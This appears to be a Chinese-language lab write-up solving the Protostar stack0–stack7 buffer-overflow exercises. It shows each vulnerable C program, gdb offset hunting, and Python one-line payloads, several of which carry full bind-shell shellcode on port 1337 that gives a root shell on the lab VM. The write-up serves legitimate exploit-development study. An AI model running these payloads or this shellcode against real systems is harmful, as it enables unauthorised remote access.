#include
#include
#include
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
思路:buffer溢出改变modified的值
$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable
#include
#include
#include
#include
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
思路:buffer溢出改变modified的值为0x61626364
$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value
#include
#include
#include
#include
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
思路:buffer溢出改变modified的值为0x0d0a0d0a,而buffer是从环境变量GREENIE复制过来的,所以设置一下该环境变量就好。
$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2
you have correctly modified the variable
这是在自己本地的Ubuntu 16.04下的执行结果
但在protostar虚拟机里,执行失败
$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name
不给设置这样的变量名
不服,写个脚本试试
import os
os.environ['GREENIE'] = 'A'*64+'\x0a\x0d\x0a\x0d'
os.system('./stack2')
$ python se.py
you have correctly modified the variable
OK
#include
#include
#include
#include
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
思路:查安全机制
$ checksec stack3
[*] '/home/jc/pwn/stack3'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
什么都没开,那么只需要反汇编看一下win的地址,利用buffer溢出就好
$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
0x08048424 <+0>: push ebp
0x08048425 <+1>: mov ebp,esp
0x08048427 <+3>: sub esp,0x18
0x0804842a <+6>: mov DWORD PTR [esp],0x8048540
0x08048431 <+13>: call 0x8048360 <puts@plt>
0x08048436 <+18>: leave
0x08048437 <+19>: ret
End of assembler dump.
找到win()的地址为0x08048424,编写payload过关
$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
#include
#include
#include
#include
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
代码真简洁!
思路:溢出buffer,造成崩溃,找到rip被覆盖的偏移量,放入win()的地址
$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA
Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76
覆盖eip的偏移量为76
gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>
win()的地址为0x80483f4
$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault
#include
#include
#include
#include
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
思路:检查安全机制
$ checksec stack5
[*] '/home/jc/pwn/stack5'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
什么也没开,所以,应该可以控制eip,执行shellcode。找到一个shell_bind_tcp 的shellcode,共89字节,端口号为1337。
生成长度为200的测试字符串
$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
运行
gdb-peda$ r
Starting program: /home/jc/pwn/stack5
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')
eip崩溃在0x41344141(‘AA4A’)
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76
偏移量为76
此时esp的地址为0xffffcec0,也是我们控制eip要转到的地址,内容为
AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
长度为120,可以容纳89字节的shellcode,还可以在shellcode前执行一段nop指令。构造payload:’A’*76+shellcode地址+shellcode
echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)
Segmentation fault!查看core
gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffceff in ?? ()
查看0xffffceff附近的存储情况
gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf07: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf0f: 0x90 0x6a 0x66 0x58
我们的shellcode的起始地址是0xffffcf00,而不是0xffffcec0,修改payload
echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)
还是Segmentation fault!再查看core
$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x90ffffcf in ?? ()
查看附近内存
gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x6a
0xffffcf10: 0x66 0x58 0x6a 0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41 0x41 0x41 0x41 0xcf 0xff 0xff 0x90
0xffffcf00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf08: 0x90 0x90 0x90 0x90
发现我们的设置的返回地址0xffffcf00中的\x00字节不在内存中,悟了!\x00字节发送不了!但是我设了16个字节的nop,返回地址往后移1到16位都行,对吧?就移1位好了,修改返回地址为0xffffcf01
echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc
成功!
protostar虚拟机里的esp的地址:0xbffffcc0
$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root
protostar虚拟机里没有发现gdb与直接运行时esp不一致的问题
#include
#include
#include
#include
void getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);
ret = __builtin_return_address(0);
if((ret & 0xbf000000) == 0xbf000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
}
int main(int argc, char **argv)
{
getpath();
}
返回地址被限制不能在栈中我们可操作的部分
思路:虽然被限制了,但只是限制了getpath函数的返回地址不能直接返回到shellcode的地址,可以控制指令重新返回到getpath的ret指令的地址,此时只要在栈顶设置好shellcode的地址,就可以绕过限制
$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80
这次getpath()的返回地址偏移量为80
gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84
栈指针地址为0xffffceb0,偏移量为84
构造payload:’A’*80+ret指令地址+ret返回地址(shellcode地址,esp+4)+shellcode
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
Segmentation fault (core dumped)
Segmentation fault!查看core文件
$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffcebd in ?? ()
查一下附近的存储情况
gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00 0x70 0xfb 0xf7 0x41 0x41 0x41 0x41
0xffffce80: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce88: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce90: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce98: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcea0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcea8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffceb0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffceb8: 0x41 0x41 0x41 0x41 0xf9 0x84 0x04 0x08
0xffffcec0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcec8: 0x41 0x41 0x41 0x41 0xf9 0x84 0x04 0x08
0xffffced0: 0xb4 0xce 0xff 0xff 0x90 0x90 0x90 0x90
0xffffced8: 0x90 0x90 0x90 0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4
发现问题了:我们第二次的返回地址应该是0xffffced4,而不是0xffffceb4
而且在连续存储64个A之后,出现了有4个A被替换的情况,此处不解,路过的friend懂的希望不吝赐教
修改payload
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc
上面是在本机Ubuntu上折腾的结果。在protostar的虚拟机上,同样栈指针的地址要加32个字节。获得的esp地址是0xbffffd20,本来+4就是0xbffffd24,但是要再加32个字节变成0xbffffd44才是正解。
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc protostar 1337
whoami
root
我尝试了在gdb里执行payload,发现gdb里是不用加32字节的,难道是gdb与系统直接运行的区别?
#include
#include
#include
#include
char *getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);
ret = __builtin_return_address(0);
if((ret & 0xb0000000) == 0xb0000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
return strdup(buffer);
}
int main(int argc, char **argv)
{
getpath();
}
思路:和stack6一样的解法
ret指令的地址:0x08048544
shellcode的起始地址:0xbffffcd4
$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc protostar 1337
whoami
root
失败不可怕,可怕的是不去找出失败的原因。